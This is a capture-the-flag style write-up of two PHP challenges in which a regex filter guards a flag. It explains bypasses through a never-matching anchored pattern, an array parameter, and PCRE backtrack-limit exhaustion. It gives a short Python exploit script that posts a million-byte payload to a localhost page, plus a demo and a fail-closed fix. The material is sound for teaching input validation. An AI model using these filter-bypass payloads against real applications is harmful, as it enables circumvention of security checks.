1. Example one
<?php
show_source(__FILE__);
function areyouok($greeting){
return preg_match('/$Merry.*Christmas/is',$greeting);
}
$greeting=@$_REQUEST['greeting'];
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
?>
The pattern is written in a single-quoted PHP string, so the leading $ is not interpolated: it reaches PCRE as an end-of-subject anchor (there is no /m modifier). An anchor followed immediately by the literal Merry can never match any string, so areyouok() returns 0 for every input and greeting=Merry Christmas alone reaches the flag branch. Sending a newline (%0a) before or after the text also works, but only because the pattern never matches in the first place, not because the newline defeats the anchor.
A second route is to send an array instead of a string, e.g. greeting[]=Merry Christmas.
preg_match() only accepts a string subject. Given an array it fails parameter parsing and never returns 1: PHP 5 returns false, PHP 7 returns null with a warning, PHP 8 throws a TypeError. On PHP 5 and 7 !areyouok() is therefore true; strpos() given an array likewise returns null rather than false, so null !== false holds and the flag is echoed.
2. Example two
<?php
function areyouok($greeting){
return preg_match('/Merry.*Christmas/is',$greeting);
}
$greeting=@$_REQUEST['greeting'];
if(!is_array($greeting)){
if(!areyouok($greeting)){
if(strpos($greeting,'Merry Christmas')!==false){
echo 'Merry Christmas. '.'flag{xxxxxx}';
}else{
echo 'Do you know .swp file?';
}
}else{
echo 'Do you know PHP?';
}
}
?>
Here an array is rejected up front, so the remaining route is PCRE's backtracking limit (pcre.backtrack_limit, 1000000 by default). After the literal Merry, the greedy .* first swallows the rest of the subject and then backs off one character per step looking for Christmas. With about a million bytes of padding after the last Christmas the limit is exceeded before the match is found: preg_match() does not crash, it returns false (preg_last_error() reports PREG_BACKTRACK_LIMIT_ERROR), so !areyouok() is true while strpos() still finds the literal Merry Christmas. The padding must come after Christmas; placed between Merry and Christmas it costs only nine backtracking steps and the pattern matches normally. On the defending side the fix is to compare the return value strictly (=== 0 for "no match") so that false fails closed, and to reject non-string input.
The same request as a Python script:
import requests

# Example two exploit: the literal "Merry Christmas" satisfies strpos(),
# while the 1,000,000 bytes of padding after it push preg_match() over
# pcre.backtrack_limit so that it returns false instead of 1.
url = "http://localhost/test1.php"
data = {"greeting": "Merry Christmas" + "a" * 1000000}
response = requests.post(url=url, data=data)
print(response.text)
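The script below is an added illustration for both examples and is not part of the original challenge code. It exercises the three preg_match() behaviours the write-up relies on (the dead $ anchor, the array subject, the backtracking limit) directly in the PHP interpreter, with no web server, and ends with a fail-closed replacement for areyouok(). The function names (anchored_never_matches, areyouok_safe, ...) are my own, the sample subjects are constructed, and the padding size assumes the default pcre.backtrack_limit of 1000000; the comments note where PHP 5 and PHP 8 behave differently from PHP 7.

```php
<?php
// Added illustration, not part of the original challenge. Run stand-alone:
//   php preg_demo.php
// Written against PHP 7.x; assumes the default pcre.backtrack_limit (1000000).

const PATTERN_ANCHORED = '/$Merry.*Christmas/is';   // example one's pattern
const PATTERN_PLAIN    = '/Merry.*Christmas/is';    // example two's pattern

// Example one: single quotes keep the '$', so PCRE sees an end-of-subject
// anchor followed by a literal. No subject can satisfy that, newline or not.
function anchored_never_matches(): bool
{
    $subjects = ["Merry Christmas", "\nMerry Christmas", "Merry Christmas\n", "xMerry Christmasx"];
    foreach ($subjects as $s) {
        if (preg_match(PATTERN_ANCHORED, $s) !== 0) {
            return false;
        }
    }
    return true;
}

// Example one, array route: a non-string subject never yields 1.
// PHP 5 returns false, PHP 7 returns null (plus a warning), PHP 8 throws TypeError.
function array_subject_result()
{
    try {
        return @preg_match(PATTERN_PLAIN, ['Merry Christmas']);
    } catch (TypeError $e) {
        return 'TypeError';
    }
}

// Example two: the greedy .* swallows the remainder and then backs off one
// character per step. A million bytes after the last "Christmas" exceed the
// limit, so preg_match() gives up and returns false instead of 1.
function backtrack_limit_hit(): array
{
    $padded = 'Merry Christmas' . str_repeat('a', 1000000);
    $result = preg_match(PATTERN_PLAIN, $padded);
    return [
        'result' => $result,                                      // false
        'limit'  => preg_last_error() === PREG_BACKTRACK_LIMIT_ERROR, // true
    ];
}

// Counter-example: padding between Merry and Christmas costs only nine
// backtracking steps, so the filter still catches it.
function padding_inside_still_matches(): bool
{
    $inside = 'Merry' . str_repeat('a', 1000000) . 'Christmas';
    return preg_match(PATTERN_PLAIN, $inside) === 1;
}

// Hardened check: insist on a string and treat anything other than a clean
// "no match" (int 0) as blocked, so an engine error fails closed.
function areyouok_safe($greeting): bool
{
    if (!is_string($greeting)) {
        return true;                                    // block arrays etc.
    }
    return preg_match(PATTERN_PLAIN, $greeting) !== 0;  // 1 or false => block
}

var_dump(anchored_never_matches());        // bool(true)
var_dump(array_subject_result());          // NULL on PHP 7
var_dump(backtrack_limit_hit());           // result => false, limit => true
var_dump(padding_inside_still_matches());  // bool(true)
var_dump(areyouok_safe('Merry Christmas' . str_repeat('a', 1000000))); // bool(true): blocked
var_dump(areyouok_safe(['Merry Christmas']));                           // bool(true): blocked
var_dump(areyouok_safe('hello'));                                       // bool(false): allowed
```

The last three calls show the difference between the challenge's check and the fail-closed one: the original treats both "no match" (0) and "engine error" (false) as safe, whereas areyouok_safe() only lets a strict 0 through.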